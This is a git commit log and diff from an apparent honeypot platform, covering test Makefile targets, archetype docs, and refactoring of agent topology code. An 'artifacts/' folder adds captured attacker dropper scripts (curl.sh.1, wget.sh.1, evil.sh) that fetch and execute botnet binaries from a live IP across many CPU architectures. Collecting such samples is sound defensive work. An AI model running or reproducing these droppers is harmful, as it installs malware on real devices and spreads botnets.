eb40be2161 chore: split dev and normal dependencies in pyproject.toml 2026-04-08 00:09:15 -04:00
0927d9e1e8 Modified: DEVELOPMENT.md 2026-04-06 12:03:36 -04:00
9c81fb4739 revert f64c251a9e
revert revert f8a9f8fc64

revert Added: modified notes. Finished CI/CD pipeline.
2026-04-06 18:02:28 +02:00
e4171789a8 Added: documentation about the deaddeck archetype and how to run it. 2026-04-06 11:51:24 -04:00
f64c251a9e revert f8a9f8fc64
revert Added: modified notes. Finished CI/CD pipeline.
2026-04-06 17:15:32 +02:00
c56c9fe667 Merge pull request 'Auto PR: dev → main' (#2) from dev into main
Some checks failed
Release / Auto-tag release (push) Successful in 14s
Release / Build, scan & push cowrie (push) Failing after 41s
Release / Build, scan & push docker_api (push) Failing after 30s
Release / Build, scan & push elasticsearch (push) Failing after 30s
Release / Build, scan & push ftp (push) Failing after 32s
Release / Build, scan & push http (push) Failing after 32s
Release / Build, scan & push imap (push) Failing after 31s
Release / Build, scan & push k8s (push) Failing after 32s
Release / Build, scan & push ldap (push) Failing after 30s
Release / Build, scan & push llmnr (push) Failing after 33s
Release / Build, scan & push mongodb (push) Failing after 32s
Release / Build, scan & push mqtt (push) Failing after 33s
Release / Build, scan & push mssql (push) Failing after 31s
Release / Build, scan & push mysql (push) Failing after 33s
Release / Build, scan & push pop3 (push) Failing after 33s
Release / Build, scan & push postgres (push) Failing after 32s
Release / Build, scan & push rdp (push) Failing after 32s
Release / Build, scan & push real_ssh (push) Failing after 33s
Release / Build, scan & push redis (push) Failing after 33s
Release / Build, scan & push sip (push) Failing after 33s
Release / Build, scan & push smb (push) Failing after 31s
Release / Build, scan & push smtp (push) Failing after 31s
Release / Build, scan & push snmp (push) Failing after 31s
Release / Build, scan & push tftp (push) Failing after 31s
Release / Build, scan & push vnc (push) Failing after 33s
Reviewed-on: #2
2026-04-06 17:11:54 +02:00
897f498bcd Merge dev into main: resolve conflicts, keep tests out of main
Some checks failed
Release / Auto-tag release (push) Successful in 14s
Release / Build, scan & push cowrie (push) Failing after 6m9s
Release / Build, scan & push docker_api (push) Failing after 31s
Release / Build, scan & push elasticsearch (push) Failing after 30s
Release / Build, scan & push ftp (push) Failing after 30s
Release / Build, scan & push http (push) Failing after 33s
Release / Build, scan & push imap (push) Failing after 30s
Release / Build, scan & push k8s (push) Failing after 30s
Release / Build, scan & push ldap (push) Failing after 33s
Release / Build, scan & push llmnr (push) Failing after 29s
Release / Build, scan & push mongodb (push) Failing after 30s
Release / Build, scan & push mqtt (push) Failing after 30s
Release / Build, scan & push mssql (push) Failing after 30s
Release / Build, scan & push mysql (push) Failing after 30s
Release / Build, scan & push pop3 (push) Failing after 32s
Release / Build, scan & push postgres (push) Failing after 29s
Release / Build, scan & push rdp (push) Failing after 29s
Release / Build, scan & push real_ssh (push) Failing after 31s
Release / Build, scan & push redis (push) Failing after 29s
Release / Build, scan & push sip (push) Failing after 30s
Release / Build, scan & push smb (push) Failing after 32s
Release / Build, scan & push smtp (push) Failing after 31s
Release / Build, scan & push snmp (push) Failing after 29s
Release / Build, scan & push tftp (push) Failing after 29s
Release / Build, scan & push vnc (push) Failing after 30s
2026-04-04 18:00:17 -03:00
92e06cb193 Add release workflow for auto-tagging and Docker image builds
Some checks failed
Release / Auto-tag release (push) Failing after 3s
Release / Build & push cowrie (push) Has been skipped
Release / Build & push docker_api (push) Has been skipped
Release / Build & push elasticsearch (push) Has been skipped
Release / Build & push ftp (push) Has been skipped
Release / Build & push http (push) Has been skipped
Release / Build & push imap (push) Has been skipped
Release / Build & push k8s (push) Has been skipped
Release / Build & push ldap (push) Has been skipped
Release / Build & push llmnr (push) Has been skipped
Release / Build & push mongodb (push) Has been skipped
Release / Build & push mqtt (push) Has been skipped
Release / Build & push mssql (push) Has been skipped
Release / Build & push mysql (push) Has been skipped
Release / Build & push pop3 (push) Has been skipped
Release / Build & push postgres (push) Has been skipped
Release / Build & push rdp (push) Has been skipped
Release / Build & push real_ssh (push) Has been skipped
Release / Build & push redis (push) Has been skipped
Release / Build & push sip (push) Has been skipped
Release / Build & push smb (push) Has been skipped
Release / Build & push smtp (push) Has been skipped
Release / Build & push snmp (push) Has been skipped
Release / Build & push tftp (push) Has been skipped
Release / Build & push vnc (push) Has been skipped
2026-04-04 17:16:53 -03:00
7ad7e1e53b main: remove tests and pytest dependency 2026-04-04 16:28:33 -03:00
963 changed files with 93452 additions and 9225 deletions

19
.gitignore vendored
View File

@@ -51,3 +51,22 @@ schem
# pydeps-style dependency graph dumps from local analysis runs. # pydeps-style dependency graph dumps from local analysis runs.
deps.txt deps.txt
# Node modules vendored under decnet/canary/ for the obfuscator helper.
# The package.json is the source of truth; modules are reinstalled at
# build/deploy time.
node_modules/
package-lock.json
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
# files alongside ARE committed and exercise the harness in CI.
tests/ttp/rule_precision/corpus/*.jsonl
tests/ttp/rule_precision/corpus/seed_*.jsonl
threatfox-api.json
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
enterprise-attack-*.json
# pytest failure dump files
testfail

219
Makefile Normal file
View File

@@ -0,0 +1,219 @@
PYTEST := .311/bin/pytest
FAIL_FAST ?= 1
ARGS :=
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
# Unit suites inherit that; special suites clear it with --override-ini.
UNIT_FLAGS := --timeout=30 --timeout-method=thread
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
--ignore=tests/api/test_schemathesis.py \
--ignore=tests/api/test_schemathesis_agent.py \
--ignore=tests/api/test_schemathesis_swarm.py \
--ignore=tests/api/test_schemathesis_ttp.py
SCHEMA_QUICK ?= 0
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
.PHONY: test-core
test-core:
$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
.PHONY: test-web
test-web:
$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
.PHONY: test-db
test-db:
$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
.PHONY: test-bus
test-bus:
$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
.PHONY: test-ttp
test-ttp:
$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
.PHONY: test-intel
test-intel:
$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
.PHONY: test-analysis
test-analysis:
$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
.PHONY: test-infra
test-infra:
$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
.PHONY: test-fleet
test-fleet:
$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
.PHONY: test-cli
test-cli:
$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
.PHONY: test-features
test-features:
$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
# ── Go and React suites ───────────────────────────────────────────────────────
_GO_MODULES := \
decnet/templates/_caddy_modules/decnetfp \
decnet/templates/http/_caddy_modules/decnetfp \
decnet/templates/https/_caddy_modules/decnetfp
.PHONY: test-go
test-go:
@failed=""; \
for mod in $(_GO_MODULES); do \
echo "=== go test: $$mod ==="; \
if (cd "$$mod" && go test ./...); then \
echo "[PASS] $$mod"; \
else \
echo "[FAIL] $$mod"; \
failed="$$failed $$mod"; \
if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
fi; \
done; \
[ -z "$$failed" ]
.PHONY: test-react
test-react:
cd decnet_web && npm run test:run $(ARGS)
# ── Special suites (sequential, longer timeout) ───────────────────────────────
.PHONY: test-live
test-live:
$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
.PHONY: test-api
test-api:
$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
.PHONY: test-stress
test-stress:
$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
.PHONY: test-service
test-service:
$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
.PHONY: test-fuzz
test-fuzz:
$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
.PHONY: test-schema
test-schema:
SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
tests/api/test_schemathesis.py \
tests/api/test_schemathesis_agent.py \
tests/api/test_schemathesis_swarm.py \
tests/api/test_schemathesis_ttp.py \
$(SCHEMA_FLAGS) $(ARGS)
.PHONY: test-bench
test-bench:
$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
.PHONY: test-docker
test-docker:
DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
# ── Static analysis ───────────────────────────────────────────────────────────
.PHONY: test-mypy
test-mypy:
.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
.PHONY: test-bandit
test-bandit:
.311/bin/bandit -r decnet -c pyproject.toml
.PHONY: test-vulture
test-vulture:
.311/bin/vulture decnet --min-confidence 80
.PHONY: test-pip-audit
test-pip-audit:
.311/bin/pip-audit
# ── Composite: all suites ─────────────────────────────────────────────────────
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
go react \
live api schema stress service fuzz bench docker \
mypy bandit vulture pip-audit
.PHONY: test-all test
test-all test:
@failed=""; \
for suite in $(_ALL_SUITES); do \
echo ""; \
echo "══════════════════════════ $$suite ══════════════════════════"; \
if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
echo "[PASS] $$suite"; \
else \
echo "[FAIL] $$suite"; \
failed="$$failed $$suite"; \
if [ "$(FAIL_FAST)" = "1" ]; then \
echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
exit 1; \
fi; \
fi; \
done; \
if [ -n "$$failed" ]; then \
echo ""; \
echo "Failed:$$failed"; \
exit 1; \
fi; \
echo ""; \
echo "All suites passed."
.PHONY: help
help:
@echo "Unit suites (xdist, 30s timeout):"
@echo " make test-core tests/core + config + factories + fixtures"
@echo " make test-web tests/web + services"
@echo " make test-db tests/db + vectorstore"
@echo " make test-bus tests/bus + logging + telemetry"
@echo " make test-ttp tests/ttp"
@echo " make test-intel tests/intel + asn + geoip"
@echo " make test-analysis tests/clustering + correlation"
@echo " make test-infra tests/agent + collector + sniffer + profiler"
@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
@echo " make test-cli tests/cli + engine + mutator + realism"
@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
@echo ""
@echo "Go / React suites:"
@echo " make test-go go test ./... in each Caddy module variant"
@echo " make test-react vitest run in decnet_web"
@echo ""
@echo "Special suites (sequential, 120s timeout):"
@echo " make test-live tests/live"
@echo " make test-api tests/api (schemathesis)"
@echo " make test-stress tests/stress"
@echo " make test-service tests/service_testing"
@echo " make test-schema schemathesis contract tests (-m fuzz, xdist logical)"
@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
@echo " make test-bench tests/perf"
@echo " make test-docker tests/docker (needs DECNET_LIVE_DOCKER=1)"
@echo ""
@echo "Static analysis:"
@echo " make test-mypy mypy type check on decnet/"
@echo " make test-bandit bandit security scan on decnet/"
@echo " make test-vulture vulture dead code scan (>=80% confidence)"
@echo " make test-pip-audit pip-audit dependency vulnerability scan"
@echo ""
@echo "Composites:"
@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
@echo ""
@echo "Passthrough: make test-web ARGS='--lf -s'"

View File

@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
| Slug | Services | OS Fingerprint | Description | | Slug | Services | OS Fingerprint | Description |
|---|---|---|---| |---|---|---|---|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop | | `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
| `windows-server` | smb, rdp, ldap | windows | Windows domain member | | `windows-server` | smb, rdp, ldap | windows | Windows domain member |
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC | | `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code. Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
```ini ```ini
[deaddeck-1]
amount=1
archetype=deaddeck
ssh.password=admin
[decky-webmail.http] [decky-webmail.http]
server_header = Apache/2.4.54 (Debian) server_header = Apache/2.4.54 (Debian)
fake_app = wordpress fake_app = wordpress

3
artifacts/curl.sh Normal file
View File

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/curl.sh' ...
Saving 'curl.sh.1'
HTTP response 200 OK [http://31.56.209.39/curl.sh]

46
artifacts/curl.sh.1 Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

3
artifacts/evil.sh Normal file
View File

@@ -0,0 +1,3 @@
wget http://31.56.209.39/wget.sh -o wget.sh
wget http://31.56.209.39/curl.sh -o curl.sh

3
artifacts/wget.sh Normal file
View File

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/wget.sh' ...
Saving 'wget.sh.1'
HTTP response 200 OK [http://31.56.209.39/wget.sh]

46
artifacts/wget.sh.1 Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

0
bait/.gitkeep Normal file
View File

5
bait/README.md Normal file
View File

@@ -0,0 +1,5 @@
# bait/
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.

BIN
decnet.tar Normal file

Binary file not shown.

View File

@@ -194,7 +194,7 @@ async def self_destruct() -> None:
argv = ["/bin/bash", path] argv = ["/bin/bash", path]
spawn_kwargs = {"start_new_session": True} spawn_kwargs = {"start_new_session": True}
subprocess.Popen( # nosec B603 subprocess.Popen( # type: ignore[call-overload] # nosec B603
argv, argv,
stdin=subprocess.DEVNULL, stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL, stdout=subprocess.DEVNULL,

View File

@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
return None return None
try: try:
from decnet import __version__ as _v from decnet import __version__ as _v # type: ignore[attr-defined]
agent_version = _v agent_version = _v
except Exception: except Exception:
agent_version = "unknown" agent_version = "unknown"

View File

@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
return str(tid) return str(tid)
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
"""Verify hash integrity and structural validity; return topology_id."""
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
return _topology_id(hydrated)
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
"""Tear down the current topology if it differs from topology_id.
Master is authoritative — a different pinned topology (fully applied,
partially applied, or drifted) is torn down before the new apply proceeds.
Refusing with 409 would leave the agent stuck in a state only a human
could resolve.
"""
existing = store.current()
if existing is None or existing.topology_id == topology_id:
return
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked by a
# half-torn-down predecessor. Leftover docker objects surface via
# the next heartbeat's observed block.
store.clear(existing.topology_id)
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
"""Create bridge networks, write compose file, and bring up containers.
Sync/blocking — callers must dispatch via asyncio.to_thread.
``--always-recreate-deps`` keeps service containers' netns shares
fresh: every decky service joins its base's netns via
``network_mode: container:<base>``, and that share is bound at
service start time. If a base is recreated (e.g. when ``ports:``
changes after toggling ``forwards_l3``) but compose decides the
services are unchanged, the services keep a stale netns FD
pointing at the destroyed base — they end up in an empty
namespace with only ``lo``, and external traffic hits a closed
port on the live base. Forcing dependents to recreate alongside
the base is the cheapest way to make this race impossible.
"""
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
for lan in hydrated["lans"]:
net_name = _topology_network_name(topology_id, lan["name"])
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
write_topology_compose(hydrated, compose_path)
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
async def apply( async def apply(
hydrated: dict[str, Any], hydrated: dict[str, Any],
version_hash: str, version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
Any docker / compose error propagates up; the endpoint maps it Any docker / compose error propagates up; the endpoint maps it
to 500 and records the message on the store row. to 500 and records the message on the store row.
""" """
local_hash = canonical_hash(hydrated) topology_id = _check_hash_and_validate(hydrated, version_hash)
if local_hash != version_hash: await _teardown_superseded(topology_id, store)
raise HashMismatch( await asyncio.to_thread(_materialise, hydrated, topology_id)
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
topology_id = _topology_id(hydrated)
# Master is authoritative. If a different topology is pinned here
# — whether it fully applied, only partially applied (failure
# marker row + orphan containers), or drifted — teardown first,
# then accept the new one. Refusing with 409 would leave the
# agent stuck in a state only a human could resolve.
existing = store.current()
if existing is not None and existing.topology_id != topology_id:
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked
# by a half-torn-down predecessor. Leftover docker objects
# will surface via the next heartbeat's observed block.
store.clear(existing.topology_id)
lans = hydrated["lans"]
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
# Bridges + compose are sync/blocking; hop to a thread so we don't
# stall the event loop on a slow docker daemon.
def _materialise() -> None:
for lan in lans:
net_name = _topology_network_name(topology_id, lan["name"])
internal = not lan["is_dmz"]
create_bridge_network(
client, net_name, lan["subnet"], internal=internal
)
write_topology_compose(hydrated, compose_path)
# ``--always-recreate-deps`` keeps service containers' netns shares
# fresh: every decky service joins its base's netns via
# ``network_mode: container:<base>``, and that share is bound at
# service start time. If a base is recreated (e.g. when ``ports:``
# changes after toggling ``forwards_l3``) but compose decides the
# services are unchanged, the services keep a stale netns FD
# pointing at the destroyed base — they end up in an empty
# namespace with only ``lo``, and external traffic hits a closed
# port on the live base. Forcing dependents to recreate alongside
# the base is the cheapest way to make this race impossible.
_compose_with_retry(
"up", "--build", "-d", "--always-recreate-deps",
compose_file=compose_path,
)
await asyncio.to_thread(_materialise)
store.put(topology_id, version_hash, hydrated) store.put(topology_id, version_hash, hydrated)
log.info( log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
)
async def teardown( async def teardown(

View File

@@ -63,6 +63,7 @@ class TopologyStore:
# The agent is single-process, so there's no real contention — # The agent is single-process, so there's no real contention —
# sqlite's own connection lock is enough. # sqlite's own connection lock is enough.
self._conn = sqlite3.connect(str(db_path), check_same_thread=False) self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute( self._conn.execute(
"CREATE TABLE IF NOT EXISTS applied_topology (" "CREATE TABLE IF NOT EXISTS applied_topology ("
" topology_id TEXT PRIMARY KEY," " topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
if row is None: if row is None:
return None return None
return AppliedRow( return AppliedRow(
topology_id=row[0], topology_id=row["topology_id"],
applied_version_hash=row[1], applied_version_hash=row["applied_version_hash"],
hydrated=json.loads(row[2]), hydrated=json.loads(row["hydrated_blob_json"]),
applied_at=int(row[3]), applied_at=int(row["applied_at"]),
last_error=row[4], last_error=row["last_error"],
) )
# ---------------------------------------------------------------- writes # ---------------------------------------------------------------- writes

View File

@@ -0,0 +1 @@
"""Artifact storage helpers shared between the web router and TTP workers."""

86
decnet/artifacts/paths.py Normal file
View File

@@ -0,0 +1,86 @@
"""
Shared on-disk artifact path resolution.
Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
quarantine tree:
